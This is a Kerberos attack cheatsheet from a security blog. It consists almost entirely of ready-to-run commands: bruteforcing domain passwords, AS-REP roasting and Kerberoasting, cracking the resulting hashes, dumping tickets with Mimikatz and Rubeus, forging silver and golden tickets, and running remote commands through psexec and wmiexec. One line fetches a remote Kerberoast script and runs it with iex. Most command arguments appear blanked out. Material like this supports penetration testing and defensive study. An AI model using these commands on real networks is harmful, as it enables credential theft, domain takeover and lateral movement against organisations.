kerberos-cheatsheet

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

shell
python kerbrute.py -domain  -users  -passwords  -outputfile 

With Rubeus version with brute module:

shell
# with a list of users
.\Rubeus.exe brute /users: /passwords: /domain: /outfile:

# check passwords for all users in current domain
.\Rubeus.exe brute /passwords: /outfile:

ASREPRoast

With Impacket example GetNPUsers.py:

shell
# check ASREPRoast for all domain users (credentials required)
python GetNPUsers.py /: -request -format  -outputfile 

# check ASREPRoast for a list of users (no credentials required)
python GetNPUsers.py / -usersfile  -format  -outputfile 

With Rubeus:

shell
# check ASREPRoast for all users in current domain
.\Rubeus.exe asreproast  /format: /outfile:

Cracking with dictionary of passwords:

shell
hashcat -m 18200 -a 0  

john --wordlist= 

Kerberoasting

With Impacket example GetUserSPNs.py:

shell
python GetUserSPNs.py /: -outputfile 

With Rubeus:

shell
.\Rubeus.exe kerberoast /outfile:

With Powershell:

iex (new-object Net.WebClient).DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1")
Invoke-Kerberoast -OutputFormat <TGSs_format [hashcat | john]> | % { $_.Hash } | Out-File -Encoding ASCII <output_TGSs_file>

Cracking with dictionary of passwords:

shell
hashcat -m 13100 --force  

john --format=krb5tgs --wordlist= 

Overpass The Hash/Pass The Key (PTK)

By using Impacket examples:

shell
# Request the TGT with hash
python getTGT.py / -hashes [lm_hash]:
# Request the TGT with aesKey (more secure encryption, probably more stealth due is the used by default by Microsoft)
python getTGT.py / -aesKey 
# Request the TGT with password
python getTGT.py /:[password]
# If not provided, password is asked

# Set the TGT for impacket use
export KRB5CCNAME=

# Execute remote commands with any of the following by using the TGT
python psexec.py /@ -k -no-pass
python smbexec.py /@ -k -no-pass
python wmiexec.py /@ -k -no-pass

With Rubeus and PsExec:

shell
# Ask and inject the ticket
.\Rubeus.exe asktgt /domain: /user: /rc4: /ptt

# Execute a cmd in the remote machine
.\PsExec.exe -accepteula \\ cmd

Pass The Ticket (PTT)

Harvest tickets from Linux

Check type and location of tickets:

shell
grep default_ccache_name /etc/krb5.conf

If none return, default is FILE:/tmp/krb5cc_%{uid}.

In case of file tickets, you can copy-paste (if you have permissions) for use them.

In case of being KEYRING tickets, you can use tickey to get them:

shell
# To dump current user tickets, if root, try to dump them all by injecting in other user processes
# to inject, copy tickey in a reachable folder by all users
cp tickey /tmp/tickey
/tmp/tickey -i

Harvest tickets from Windows

With Mimikatz:

shell
mimikatz # sekurlsa::tickets /export

With Rubeus in Powershell:

shell
.\Rubeus dump

# After dump with Rubeus tickets in base64, to write the in a file
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String(""))

To convert tickets between Linux/Windows format with ticket_converter.py:

python ticket_converter.py ticket.kirbi ticket.ccache
python ticket_converter.py ticket.ccache ticket.kirbi

Using ticket in Linux:

With Impacket examples:

shell
# Set the ticket for impacket use
export KRB5CCNAME=

# Execute remote commands with any of the following by using the TGT
python psexec.py /@ -k -no-pass
python smbexec.py /@ -k -no-pass
python wmiexec.py /@ -k -no-pass

Using ticket in Windows

Inject ticket with Mimikatz:

shell
mimikatz # kerberos::ptt 

Inject ticket with Rubeus:

shell
.\Rubeus.exe ptt /ticket:

Execute a cmd in the remote machine with PsExec:

shell
.\PsExec.exe -accepteula \\ cmd

Silver ticket

With Impacket examples:

shell
# To generate the TGS with NTLM
python ticketer.py -nthash  -domain-sid  -domain  -spn   

# To generate the TGS with AES key
python ticketer.py -aesKey  -domain-sid  -domain  -spn   

# Set the ticket for impacket use
export KRB5CCNAME=

# Execute remote commands with any of the following by using the TGT
python psexec.py /@ -k -no-pass
python smbexec.py /@ -k -no-pass
python wmiexec.py /@ -k -no-pass

With Mimikatz:

shell
# To generate the TGS with NTLM
mimikatz # kerberos::golden /domain:/sid: /rc4: /user: /service: /target:

# To generate the TGS with AES 128 key
mimikatz # kerberos::golden /domain:/sid: /aes128: /user: /service: /target:

# To generate the TGS with AES 256 key (more secure encryption, probably more stealth due is the used by default by Microsoft)
mimikatz # kerberos::golden /domain:/sid: /aes256: /user: /service: /target:

# Inject TGS with Mimikatz
mimikatz # kerberos::ptt 

Inject ticket with Rubeus:

shell
.\Rubeus.exe ptt /ticket:

Execute a cmd in the remote machine with PsExec:

shell
.\PsExec.exe -accepteula \\ cmd

Golden ticket

With Impacket examples:

shell
# To generate the TGT with NTLM
python ticketer.py -nthash  -domain-sid  -domain   

# To generate the TGT with AES key
python ticketer.py -aesKey  -domain-sid  -domain   

# Set the ticket for impacket use
export KRB5CCNAME=

# Execute remote commands with any of the following by using the TGT
python psexec.py /@ -k -no-pass
python smbexec.py /@ -k -no-pass
python wmiexec.py /@ -k -no-pass

With Mimikatz:

shell
# To generate the TGT with NTLM
mimikatz # kerberos::golden /domain:/sid: /rc4: /user:

# To generate the TGT with AES 128 key
mimikatz # kerberos::golden /domain:/sid: /aes128: /user:

# To generate the TGT with AES 256 key (more secure encryption, probably more stealth due is the used by default by Microsoft)
mimikatz # kerberos::golden /domain:/sid: /aes256: /user:

# Inject TGT with Mimikatz
mimikatz # kerberos::ptt 

Inject ticket with Rubeus:

shell
.\Rubeus.exe ptt /ticket:

Execute a cmd in the remote machine with PsExec:

shell
.\PsExec.exe -accepteula \\ cmd

Misc

To get NTLM from password:

python
python -c 'import hashlib,binascii; print binascii.hexlify(hashlib.new("md4", "<password>".encode("utf-16le")).digest())'

Tools


Author : Puckiestyle
Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *